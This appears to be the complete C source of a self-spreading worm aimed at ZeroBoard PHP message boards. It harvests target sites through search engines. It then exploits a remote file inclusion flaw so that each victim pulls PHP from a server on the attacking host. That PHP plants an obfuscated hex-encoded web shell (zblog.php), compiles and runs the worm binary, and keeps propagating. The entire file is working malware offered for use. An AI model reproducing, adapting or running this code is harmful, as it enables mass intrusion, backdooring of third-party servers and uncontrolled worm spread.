ZeroBoard Worm Source Code

1. /*
2. The worm exploits a vulnerability in ZeroBoard, allowing an attacker to inject arbitrary PHP code.
3.  
4. /str0ke
5. */
6.  
7. /*
8. ** ZeroBoard -1day INE w0rm
9. */
10.  
11. #include <stdio.h>
12. #include <unistd.h>
13. #include <stdlib.h>
14. #include <sys/socket.h>
15. #include <netdb.h>
16. #include <netinet/in.h>
17. #include <signal.h>
18. #include <sys/ioctl.h>
19. #include <net/if.h>
20. #ifdef __sun__
21. #include <sys/sockio.h>
22. #endif /* __SunOS__ */
23.  
24. #define DEBUG_ING
25. #undef DEBUG_ING
26.  
27. #define TMP_FILE "./tmp.core"
28. #define CMD_FILE "./cmd.core"
29. #define PRC_FILE "./proc.core"
30. #define SCS (0)
31. #define MIN (1)
32.  
33. #ifdef __linux__
34. #define DEF_ETH "eth0"
35. #else
36. #ifdef __FreeBSD__
37. #define DEF_ETH "ed0"
38. #else
39. #ifdef __sun__
40. #define DEF_ETH "hme0"
41. #endif
42. #endif
43. #endif
44.  
45. #define MAX_BUF (0x0000ffff)
46. #define FIR_BUF (0x00000800)
47. #define SEC_BUF (0x00000400)
48. #define THR_BUF (0x00000200)
49. #define MIN_BUF (0x00000100)
50.  
51. #define VENDOR "nzeo.com"
52.  
53. // search rule
54. #define FD_RULE_0 "/zboard/zboard.php"
55. #define FD_RULE_1 "/zb41/zboard.php"
56. #define FD_RULE_2 "/bbs/zboard.php"
57. #define FD_RULE_3 "/zb/zboard.php"
58. #define FD_RULE_4 "/zb40/zboard.php"
59. #define FD_RULE_5 "/board/zboard.php"
60. #define FD_RULE_6 "zboard.php"
61. #define FD_RULE_7 "zboard.ph"
62.  
63. // pattern
64. #define FD_PATH_0 "/zboard/skin/zero_vote/login.php"
65. #define FD_PATH_1 "/zb41/skin/zero_vote/login.php"
66. #define FD_PATH_2 "/bbs/skin/zero_vote/login.php"
67. #define FD_PATH_3 "/zb/skin/zero_vote/login.php"
68. #define FD_PATH_4 "/zb40/skin/zero_vote/login.php"
69. #define FD_PATH_5 "/board/skin/zero_vote/login.php"
70. #define FD_PATH_6 "/skin/zero_vote/login.php"
71.  
72. #define RESULT_OK "200 OK"
73. #define MAKE_STR1 "BACKDOOR MAKE SUCCESS"
74. #define MAKE_STR2 "ZBCODE MAKE SUCCESS"
75. #define DELT_STR1 "BACKDOOR DELETE SUCCESS"
76. #define DELT_STR2 "ZBCODE DELETE SUCCESS"
77.  
78. #define DEF_PORT (31337)
79. #define CONN_PORT (80)
80. #define DEF_TIME (20)
81.  
82. int set_sock(char *sc_gt_host,int port,int type);
83. void re_connt_lm(int st_sock_va,int type);
84. int proc_r();
85. void t_kill();
86. void sf_exit();
87. int g_ip(char *ip);
88. int make_cmd_file();
89. int filter_f(char *test_bf,int tnum);
90.  
91. int sock;
92.  
93. struct tg_rl
94. {
95.  int r_num;
96.  char *r_str;
97.  char *url_str;
98. };
99.  
100. #define TARGET_NUM (7)
101. #define SEARCH_NUM (4)
102.  
103. struct tg_rl __tg_rule_va[]=
104. {
105.  {0,FD_RULE_0,FD_PATH_0},
106.  {1,FD_RULE_1,FD_PATH_1},
107.  {2,FD_RULE_2,FD_PATH_2},
108.  {3,FD_RULE_3,FD_PATH_3},
109.  {4,FD_RULE_4,FD_PATH_4},
110.  {5,FD_RULE_5,FD_PATH_5},
111.  {6,FD_RULE_6,FD_PATH_6},
112.  {7,FD_RULE_7,FD_PATH_6},
113.  {8,NULL,NULL}
114. };
115.  
116. struct search_rule
117. {
118.  int num;
119.  u_char *url;
120.  int maxnum;
121.  int defnum;
122.  u_char *http_head;
123. };
124.  
125. struct search_rule search_va[]=
126. {
127.  {0,"www.google.com",990,10,"http://"},
128.  {1,"kr.search.yahoo.com",990,15,"http://"},
129.  {2,"search.nate.com",480,10,"http://"},
130.  {3,"search.lycos.com",990,10,"//"},
131.  {4,"kr.altavista.com",1000,10,"//"},
132.  {5,NULL,0,0,NULL}
133. };
134.  
135. void t_kill()
136. {
137. #ifdef DEBUG_ING
138.  fprintf(stdout,"time out\n");
139. #endif
140.  close(sock);
141.  sock=-1;
142.  signal(SIGALRM,SIG_DFL);
143.  return;
144. }
145.  
146. void sf_exit()
147. {
148. #ifdef DEBUG_ING
149.  fprintf(stdout,"safe exit\n");
150. #endif
151.  close(sock);
152.  kill((int)proc_r(),9);
153.  unlink(TMP_FILE);
154.  unlink(CMD_FILE);
155.  unlink(PRC_FILE);
156.  exit(-1);
157. }
158.  
159. int main(int argc,char *argv[])
160. {
161.  FILE *fp;
162.  
163.  int tnum=(SCS);
164.  int chk=(SCS);
165.  int gogo=(SCS);
166.  int whgl=(SCS);
167.  int qnum=(SCS);
168.  int tgrl_sl=(MIN);
169.  int _conn_num=(SCS);
170.  int port=(CONN_PORT);
171.  int def_port=(DEF_PORT);
172.  int sc_gt_sock;
173.  int host_chk=(SCS);
174.  
175.  u_char *gg_ptr=NULL;
176.  u_char *t_ptr=NULL;
177.  u_char __zr_bf[(MAX_BUF)];
178.  u_char *port_ptr=NULL;
179.  
180.  char pkt[(FIR_BUF)];
181.  char host[(SEC_BUF)];
182.  char url[(SEC_BUF)];
183.  char test_bf[(MAX_BUF)];
184.  char req_t_bf[(THR_BUF)];
185.  char ip[(MIN_BUF)];
186.  char atk_code[(MIN_BUF)];
187.  
188.  signal(SIGINT,sf_exit);
189.  signal(SIGTSTP,sf_exit);
190.  
191.  while((whgl=getopt(argc,argv,"S:s:T:t:Q:q:P:p:H:h:U:u:"))!=EOF)
192.  {
193.   extern char *optarg;
194.   switch(whgl)
195.   {
196.    case 'S':
197.    case 's':
198.     tnum=atoi(optarg);
199.     if(SEARCH_NUM<tnum)
200.     {
201.      fprintf(stderr,"target error\n");
202.      exit(-1);
203.     }
204.     break;
205.  
206.    case 'T':
207.    case 't':
208.     tgrl_sl=atoi(optarg);
209.     if(TARGET_NUM<tgrl_sl)
210.     {
211.      fprintf(stderr,"target error\n");
212.      exit(-1);
213.     }
214.     break;
215.  
216.    case 'Q':
217.    case 'q':
218.     qnum=atoi(optarg);
219.     break;
220.      
221.    case 'P':
222.    case 'p':
223.     def_port=atoi(optarg);
224.     break;
225.      
226.    case 'H':
227.    case 'h':
228.     memset((char *)host,0,sizeof(host));
229.     strncpy(host,optarg,sizeof(host)-1);
230.     host_chk++;
231.     break;
232.      
233.    case 'U':
234.    case 'u':
235.     memset((char *)url,0,sizeof(url));
236.     strncpy(url,optarg,sizeof(url)-1);
237.     host_chk++;
238.     break;
239.      
240.    default:
241.     exit(-1);
242.   }
243.  }
244.  
245.  (int)make_cmd_file();
246.  
247.  if(fork()==0)
248.  {
249.   signal(SIGALRM,SIG_IGN);
250.   for(whgl=0;whgl<argc;whgl++)
251.   {
252.    memset((char *)argv[whgl],0,strlen(argv[whgl]));
253.   }
254.   strcpy(argv[0],"receive mode process");
255.   if((fp=fopen(PRC_FILE,"w"))==NULL)
256.   {
257.    sf_exit();
258.   }
259.   fprintf(fp,"%d\n",getpid());
260.   fclose(fp);
261.   sc_gt_sock=(int)set_sock(NULL,def_port,1);
262.   (void)re_connt_lm(sc_gt_sock,0);
263.  }
264.  else
265.  {
266.   for(whgl=0;whgl<argc;whgl++)
267.   {
268.    memset((char *)argv[whgl],0,strlen(argv[whgl]));
269.   }
270.   strcpy(argv[0],"scanning mode process");
271.  
272.   switch(host_chk)
273.   {
274.    case 1:
275. #ifdef DEBUG_ING
276.     fprintf(stdout,"argument error\n");
277. #endif
278.     sf_exit();
279.     break;
280.      
281.    case 2:
282.     goto ok;
283.     break;
284.   }
285.  
286. #ifdef DEBUG_ING
287.   fprintf(stdout,"search url: %s\n",search_va[tnum].url);
288. #endif
289.   for(_conn_num=qnum; _conn_num< search_va[tnum].maxnum; _conn_num += (search_va[tnum].defnum))
290.   {
291. conn: if((sock=(int)set_sock(search_va[tnum].url,(CONN_PORT),0))==-1)
292.    {
293.     goto conn;
294.    }
295.  
296.    memset((char *)req_t_bf,0,sizeof(req_t_bf));
297.    switch(search_va[tnum].num)
298.    {
299.     case 0:
300.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
301.       "GET /search?q=%s"
302.       "&hl=ko&lr=&ie=UTF-8&start=%d&sa=N "
303.       "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
304.      break;
305.     case 1:
306.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
307.       "GET /search/web?p=%s&b=%d "
308.       "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
309.      break;
310.     case 2:
311.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
312.       "GET /webpage/search.asp?query=%s&start=%d "
313.       "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
314.      break;
315.     case 3:
316.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
317.       "GET /default.asp?query=%s&first=%d&pmore=more "
318.       "HTTP/1.0\r\n"
319.       "Accept-Language: ko\r\n"
320.       "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n"
321.       "Host: %s\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);
322.      break;
323.     case 4:
324.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
325.       "GET /web/results?itag=wrx&q=%s&stq=%d "
326.       "HTTP/1.0\r\n"
327.       "Accept-Language: ko\r\n"
328.       "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n"
329.       "Host: %s\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);
330.      break;
331.    }
332.    send(sock,req_t_bf,strlen(req_t_bf),0);
333.    whgl=(SCS);
334.  
335.    if((fp=fopen(TMP_FILE,"w"))==NULL)
336.    {
337.     return(-1);
338.    }
339.    signal(SIGALRM,SIG_IGN);
340.    alarm(MAX_BUF);
341.    
342.    memset((char *)test_bf,0,sizeof(test_bf));
343.    while(recv(sock,test_bf,sizeof(test_bf)-1,0))
344.    {
345.     fprintf(fp,"%s",test_bf);
346.     memset((char *)test_bf,0,sizeof(test_bf));
347.    }
348.    fclose(fp);
349.    close(sock);
350.  
351.    if((fp=fopen(TMP_FILE,"r"))==NULL)
352.    {
353.     return(-1);
354.    }
355.  
356.    while(fgets(__zr_bf,sizeof(__zr_bf)-1,fp))
357.    {
358.     gg_ptr=__zr_bf;
359.  
360.     while(MIN)
361.     {
362.      t_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head);
363.      gg_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
364.  
365.      if(t_ptr!=NULL)
366.      {
367.       memset((char *)test_bf,0,sizeof(test_bf));
368.       whgl=(SCS);
369.       chk=(SCS);
370.  
371.       for(gogo=0;gogo<strlen(t_ptr);gogo++)
372.       {
373.        if(chk)
374.        {
375.         if(t_ptr[gogo]=='>')
376.          chk=0;
377.        }
378.        else {
379.         if(t_ptr[gogo]==' ')
380.          continue;
381.         else if(t_ptr[gogo]=='<')
382.          chk=1;
383.         else test_bf[whgl++]=t_ptr[gogo];
384.        }
385.       }
386.  
387.       if(!strstr(test_bf,__tg_rule_va[tgrl_sl].r_str))
388.        continue;
389.       else t_ptr=(char *)strstr(test_bf,__tg_rule_va[tgrl_sl].r_str);
390.  
391.       if(t_ptr!=NULL)
392.        t_ptr[0]='\0';
393.       else continue;
394.  
395.       if(filter_f(test_bf,tnum))
396.       {
397.        t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
398.        if(strstr(t_ptr,search_va[tnum].http_head))
399.         continue;
400.  
401.        memset((char *)host,0,sizeof(host));
402.        memset((char *)url,0,sizeof(url));
403.  
404.        chk=(SCS);
405.  
406.        if(strstr(test_bf,search_va[tnum].http_head))
407.        {
408.         t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
409.         port=(CONN_PORT);
410.  
411.         for(whgl=0;whgl<strlen(t_ptr)+1;whgl++)
412.         {
413.          if(t_ptr[whgl]=='/')
414.          {
415.           for(gogo=0;whgl<strlen(t_ptr);whgl++)
416.            url[gogo++]=t_ptr[whgl];
417.           strcat(url,__tg_rule_va[tgrl_sl].url_str);
418.           break;
419.          }
420.          else if(t_ptr[whgl]=='\0')
421.          {
422.           strncpy(url,__tg_rule_va[tgrl_sl].url_str,sizeof(url)-1);
423.           break;
424.          }
425.          else if(t_ptr[whgl]==':')
426.          {
427.           port_ptr=(char *)strstr(t_ptr,":")+1;
428.           port=atoi(port_ptr);
429.          }
430.          else host[chk++]=t_ptr[whgl];
431.         }
432. #ifdef DEBUG_ING
433.         fprintf(stdout,"Total:%s,URL:%s,HOST:%s,PORT:%d\n",test_bf,url,host,port);
434. #endif
435. ok:
436.         sock=set_sock(host,port,0);
437.         if(sock==-1)
438.          continue;
439.         else {
440.          memset((char *)ip,0,sizeof(ip));
441.          memset((char *)atk_code,0,sizeof(atk_code));
442.          memset((char *)pkt,0,sizeof(pkt));
443.  
444.          (int)g_ip(ip);
445.          snprintf(atk_code,sizeof(atk_code)-1,"dir=http://%s:%d/\r\n",ip,def_port);
446.          snprintf(pkt,sizeof(pkt)-1,
447.           "POST http://%s%s HTTP/1.0\r\n"
448.           "Content-Type: application/x-www-form-urlencoded\r\n"
449.           "Content-Length: %d\r\n"
450.           "Host: %s\r\n\r\n%s\r\n",host,url,strlen(atk_code),host,atk_code);
451.          send(sock,pkt,strlen(pkt),0);
452.          memset((char *)pkt,0,sizeof(pkt));
453.          recv(sock,pkt,sizeof(pkt)-1,0);
454. #ifdef DEBUG_ING
455.          if(strstr(pkt,RESULT_OK))
456.          {
457.           if(strstr(pkt,MAKE_STR1))
458.            fprintf(stdout,"%s\n",MAKE_STR1);
459.           if(strstr(pkt,MAKE_STR2))
460.            fprintf(stdout,"%s\n",MAKE_STR2);
461.           if(strstr(pkt,DELT_STR1))
462.            fprintf(stdout,"%s\n",DELT_STR1);
463.           if(strstr(pkt,DELT_STR2))
464.            fprintf(stdout,"%s\n",DELT_STR2);
465.           printf("%s: %s\n",RESULT_OK,host);
466.          }
467. #endif
468.         }
469.         close(sock);
470.  
471.         if(host_chk)
472.         {
473.          sf_exit();
474.         }
475.        }
476.       }
477.      }
478.      else break;
479.     }
480.     memset((char *)__zr_bf,0,sizeof(__zr_bf));
481.    }
482.    fclose(fp);
483.    unlink(TMP_FILE);
484.   }
485.   sf_exit();
486.  }
487. }
488.  
489. int set_sock(char *sc_gt_host,int port,int type)
490. {
491.  struct sockaddr_in sock_st;
492.  struct sockaddr_in t_st;
493.  int nw_gt_sock,s_s;
494.  struct hostent *hst_etr;
495.  int sc_gt_sock;
496.  int t_c=0;
497.  char t_b[(SEC_BUF)];
498.  FILE *fp;
499.  char http_rq[]="HTTP/1.1 200 OK\r\n\r\n";
500.  
501.  if(!type){
502.   signal(SIGALRM,t_kill);
503.   alarm(DEF_TIME);
504.  
505.   if((hst_etr=gethostbyname(sc_gt_host))==NULL)
506.   {
507.    return(-1);
508.   }
509.   if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
510.   {
511.    return(-1);
512.   }
513.   sock_st.sin_family=(AF_INET);
514.   sock_st.sin_port=htons(port);
515.   sock_st.sin_addr=*((struct in_addr *)hst_etr->h_addr);
516.   memset(&(sock_st.sin_zero),0,8);
517.  
518.   if(connect(sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1)
519.   {
520.    close(sock);
521.    return(-1);
522.   }
523.   return(sock);
524.  }
525.  else{
526.   if((sc_gt_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
527.   {
528.    return(-1);
529.   }
530.  
531.   sock_st.sin_family=(AF_INET);
532.   sock_st.sin_port=htons(port);
533.   sock_st.sin_addr.s_addr=(INADDR_ANY);
534.   memset(&(sock_st.sin_zero),0,8);
535.  
536.   if(bind(sc_gt_sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1)
537.   {
538.    close(sc_gt_sock);
539.    return(-1);
540.   }
541. #define BK_LG 10
542.   if(listen(sc_gt_sock,(BK_LG))==-1){
543.    close(sc_gt_sock);
544.    return(-1);
545.   }
546.   while(1){
547.    s_s=sizeof(struct sockaddr_in);
548.    if((nw_gt_sock=accept(sc_gt_sock,(struct sockaddr *)&t_st,&s_s))==-1)
549.    {
550.     close(nw_gt_sock);
551.     close(sc_gt_sock);
552.     return(-1);
553.    }
554.    while(recv(nw_gt_sock,&t_c,1,0)){
555.     if(t_c==0x0d){
556.      recv(nw_gt_sock,&t_c,1,0);
557.      if(t_c==0x0a){
558.       recv(nw_gt_sock,&t_c,1,0);
559.       if(t_c==0x0d){
560.        recv(nw_gt_sock,&t_c,1,0);
561.        if(t_c==0x0a){
562.         break;
563.        }
564.       }
565.      }
566.     }
567.    }
568.  
569.    send(nw_gt_sock,http_rq,strlen(http_rq),0);
570.    if((fp=fopen(CMD_FILE,"r"))==NULL){
571.     close(nw_gt_sock);
572.     close(sc_gt_sock);
573.     return(-1);
574.    }
575.    memset((char *)t_b,0,sizeof(t_b));
576.    while(fgets(t_b,sizeof(t_b)-1,fp)){
577.     send(nw_gt_sock,t_b,strlen(t_b),0);
578.    }
579.    fclose(fp);
580.    close(nw_gt_sock);
581.    continue;
582.   }
583.   close(sc_gt_sock);
584.   return(-1);
585.  }
586. }
587.  
588. void re_connt_lm(int st_sock_va,int type)
589. {
590.  if(st_sock_va==-1)
591.  {
592.   if(!type){
593.    kill(getppid(),9); // parent
594.   }
595.   kill((int)proc_r(),9); // child
596.   sf_exit();
597.  }
598. }
599.  
600. int proc_r(){
601.  FILE *fp;
602.  int proc_n;
603.  if((fp=fopen(PRC_FILE,"r"))==NULL){
604.   exit(-1); // child check.
605.  }
606.  fscanf(fp,"%16d",&proc_n);
607.  fclose(fp);
608.  return proc_n;
609. }
610.  
611. int g_ip(char *ip)
612. {
613.  int sock;
614.  struct ifreq ifpq;
615.  struct sockaddr_in *pq;
616.  
617.  memset(&ifpq,0,sizeof(ifpq));
618.  if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
619.  {
620.   return(-1);
621.  }
622.  pq=(struct sockaddr_in *)&ifpq.ifr_addr;
623.  pq->sin_family=AF_INET;
624.  
625.  memcpy(ifpq.ifr_name,(DEF_ETH),sizeof(ifpq.ifr_name));
626.  if(ioctl(sock,SIOCGIFADDR,&ifpq)==0)
627.  {
628.   memset((char *)ip,0,(MIN_BUF));
629.   snprintf(ip,(MIN_BUF)-1,"%s",inet_ntoa(pq->sin_addr));
630.  }
631.  return 0;
632. }
633.  
634. #define BACKDOOR_PATH "zblog.php"
635. #define CODE_PATH "zbcode"
636. #define CODE_PATH_SRC "zbcode.c"
637.  
638. int make_cmd_file()
639. {
640.  unsigned long w1=0;
641.  FILE *fp;
642.  FILE *pf;
643.  
644.  if((fp=fopen(CMD_FILE,"w"))==NULL)
645.  {
646.   return(-1);
647.  }
648.  
649.  fprintf(fp,"<?\n"
650.   "chdir('../../');\n\n"
651.   "if(($fp=fopen('%s','r'))!=NULL)\n"
652.   "{\n"
653.   "$pnum=fread($fp,32);\n"
654.   "fclose($fp);\n"
655.   "$pnum=str_replace(\"\\n\",\"\",$pnum);\n"
656.   "if(($fp=fopen('/proc/'.$pnum.'/stat','r'))!=NULL)\n"
657.   "{\n"
658.   "exit;\n"
659.   "}\n"
660.   "}\n\n"
661.   "$cont=\"\\x3c\\x3f\\x0a\\x09\\x65\\x63\\x68\\x6f\\x20\\x27\\x3c\\x46\".\n"
662.   "\"\\x4f\\x52\\x4d\\x20\\x41\\x43\\x54\\x49\\x4f\\x4e\\x3d\\x24\".\n"
663.   "\"\\x50\\x48\\x50\\x5f\\x53\\x45\\x4c\\x46\\x20\\x4d\\x45\\x54\".\n"
664.   "\"\\x48\\x4f\\x44\\x3d\\x50\\x4f\\x53\\x54\\x3e\\x27\\x3b\\x0a\".\n"
665.   "\"\\x09\\x65\\x63\\x68\\x6f\\x20\\x27\\x3c\\x49\\x4e\\x50\\x55\".\n"
666.   "\"\\x54\\x20\\x54\\x59\\x50\\x45\\x3d\\x48\\x49\\x44\\x44\\x45\".\n"
667.   "\"\\x4e\\x20\\x4e\\x41\\x4d\\x45\\x3d\\x63\\x6d\\x64\\x20\\x56\".\n"
668.   "\"\\x41\\x4c\\x55\\x45\\x3d\\x24\\x63\\x6f\\x6d\\x6d\\x61\\x6e\".\n"
669.   "\"\\x64\\x3e\\x3c\\x2f\\x46\\x4f\\x52\\x4d\\x3e\\x3c\\x50\\x52\".\n"
670.   "\"\\x45\\x3e\\x27\\x3b\\x0a\\x09\\x24\\x63\\x6f\\x6d\\x6d\\x61\".\n"
671.   "\"\\x6e\\x64\\x3d\\x73\\x74\\x72\\x5f\\x72\\x65\\x70\\x6c\\x61\".\n"
672.   "\"\\x63\\x65\\x28\\x27\\x5c\\x5c\\x27\\x2c\\x27\\x27\\x2c\\x24\".\n"
673.   "\"\\x63\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x29\\x3b\\x0a\\x09\\x65\".\n"
674.   "\"\\x63\\x68\\x6f\\x20\\x60\\x24\\x63\\x6f\\x6d\\x6d\\x61\\x6e\".\n"
675.   "\"\\x64\\x60\\x3b\\x0a\\x3f\\x3e\\x0a\";\n\n"
676.   "$fp=fopen('%s','w');\n"
677.   "fputs($fp,$cont);\n"
678.   "fclose($fp);\n\n",PRC_FILE,BACKDOOR_PATH);
679.  
680.  if((pf=fopen(CODE_PATH,"r"))==NULL)
681.  {
682.   return(-1);
683.  }
684.  
685.  fprintf(fp,"$cont=\"");
686.  while(fread(&w1,1,1,pf))
687.  {
688.   fprintf(fp,"\\x%02x",w1);
689.  }
690.  fclose(pf);
691.  fprintf(fp,"\";\n\n");
692.  
693.  fprintf(fp,"$fp=fopen('%s','w');\n"
694.   "fputs($fp,$cont);\n"
695.   "fclose($fp);\n\n",CODE_PATH);
696.  if((pf=fopen(CODE_PATH_SRC,"r"))==NULL)
697.  {
698.   return(-1);
699.  }
700.  fprintf(fp,"$cont=\"");
701.  while(fread(&w1,1,1,pf))
702.  {
703.   fprintf(fp,"\\x%02x",w1);
704.  }
705.  fclose(pf);
706.  fprintf(fp,"\";\n\n");
707.  
708.  fprintf(fp,"$fp=fopen('%s','w');\n"
709.   "fputs($fp,$cont);\n"
710.   "fclose($fp);\n\n",CODE_PATH_SRC);
711.  fprintf(fp,"$RES=`gcc -o %s %s`;\n\n",CODE_PATH,CODE_PATH_SRC);
712.  
713.  fprintf(fp,"chmod('%s',0755);\n",CODE_PATH);
714.  
715.  fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL){\n",BACKDOOR_PATH);
716.  fprintf(fp,"echo \"%s\\n\";\n",MAKE_STR1);
717.  fprintf(fp,"} fclose($fp);\n\n");
718.  fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL){\n",CODE_PATH);
719.  fprintf(fp,"echo \"%s\\n\";\n",MAKE_STR2);
720.  fprintf(fp,"} fclose($fp);\n\n");
721.  
722. #if 1
723.  fprintf(fp,"$fnum=(rand()%%%d);\n",TARGET_NUM);
724.  fprintf(fp,"$snum=(rand()%%%d);\n",SEARCH_NUM);
725.  fprintf(fp,"$randnum=(rand()%400);\n");
726.  
727.  fprintf(fp,"while(1)\n{\n");
728.  fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL)\n"
729.   "{\n"
730.   "$pnum=fread($fp,32);\n"
731.   "fclose($fp);\n"
732.   "$pnum=str_replace(\"\\n\",\"\",$pnum);\n"
733.   "if(($fp=fopen('/proc/'.$pnum.'/stat','r'))!=NULL)\n"
734.   "{\n"
735.   "exit;\n"
736.   "}\n"
737.   "}\n\n",PRC_FILE);
738.  
739.  fprintf(fp,"$port=(rand()%%65500);\n");
740.  fprintf(fp,"if($port>1024){\n");
741.  fprintf(fp,"exec(\"./%s -t $fnum -p $port -s $snum -q $randnum\");\n",CODE_PATH);
742.  fprintf(fp,"}\n}\n");
743. #else
744.  fprintf(fp,"unlink('%s');\n",BACKDOOR_PATH);
745.  fprintf(fp,"unlink('%s');\n",CODE_PATH);
746.  
747.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH);
748.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1);
749.  fprintf(fp,"} else { fclose($fp);\n");
750.  fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",BACKDOOR_PATH,BACKDOOR_PATH);
751.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH);
752.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1);
753.  fprintf(fp,"}\n}\n");
754.  
755.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH);
756.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2);
757.  fprintf(fp,"} else { fclose($fp);\n");
758.  fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",CODE_PATH,CODE_PATH);
759.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH);
760.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2);
761.  fprintf(fp,"}\n}\n");
762. #endif
763.  fprintf(fp,"?>\n");
764.  fclose(fp);
765. }
766.  
767. int filter_f(char *test_bf,int tnum)
768. {
769.  switch(search_va[tnum].num)
770.  {
771.   case 0: /* google */
772.    if(!strstr(test_bf,"google")&&!strstr(test_bf,"/search?q=cache:")
773.     &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
774.     &&!strstr(test_bf,"%3F")&&!strstr(test_bf,"...")
775.     &&!strstr(test_bf,VENDOR))
776.    {
777.     return 1;
778.    }
779.    else return 0;
780.    break;
781.    
782.   case 1: /* yahoo */
783.    if(!strstr(test_bf,"yahoo")&&!strstr(test_bf,"/cache.php?")
784.     &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
785.     &&!strstr(test_bf,"search")&&!strstr(test_bf,".html%")
786.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
787.    {
788.     return 1;
789.    }
790.    else return 0;
791.    break;
792.    
793.   case 2: /* nate */
794.    if(!strstr(test_bf,"nate")&&!strstr(test_bf,"RESULT")
795.     &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
796.     &&!strstr(test_bf,"/search/")&&!strstr(test_bf,"%3F")
797.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
798.    {
799.     return 1;
800.    }
801.    else return 0;
802.    break;
803.    
804.   case 3: /* lycos */
805.    if(!strstr(test_bf,"lycos")&&!strstr(test_bf,"<")
806.     &&!strstr(test_bf,">")&&!strstr(test_bf,"%3F")
807.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
808.    {
809.     return 1;
810.    }
811.    else return 0;
812.    break;
813.    
814.   case 4: /* altavista */
815.    if(!strstr(test_bf,"ref_")&&!strstr(test_bf,"<")
816.     &&!strstr(test_bf,">")&&!strstr(test_bf,"%3f")
817.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
818.    {
819.     return 1;
820.    }
821.    else return 0;
822.    break;
823.    
824.   default:
825.    return 0;
826.    break;
827.  }
828.  return 0;
829. }